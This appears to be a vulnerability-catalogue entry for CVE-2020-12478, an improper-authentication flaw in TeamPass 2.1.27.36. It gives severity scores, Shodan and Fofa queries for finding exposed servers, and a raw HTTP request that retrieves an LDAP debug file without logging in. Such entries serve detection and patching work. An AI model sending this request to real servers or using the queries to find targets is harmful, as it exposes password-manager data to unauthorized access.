| Title | TeamPass 2.1.27.36 - Improper Authentication |
|---|---|
| Author | arafatansari |
| Severity | High |
| Impact | An attacker can bypass authentication and gain unauthorized access to sensitive information. |
| Remediation | Upgrade to a patched version of TeamPass or apply the recommended security patches. |
| CVSS Score | 7.5 |
| EPSS Score | 0.38993 |
| CVE ID | CVE-2020-12478 |
| CWE ID | CWE-306 |
| Shodan Query | http.html:"teampass" |
| Fofa Query | body="teampass" |
| Tags | cve2020 cve teampass exposure unauth vuln |
TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
GET /files/ldap.debug.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-12478.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-12478.pcap
N/AN/A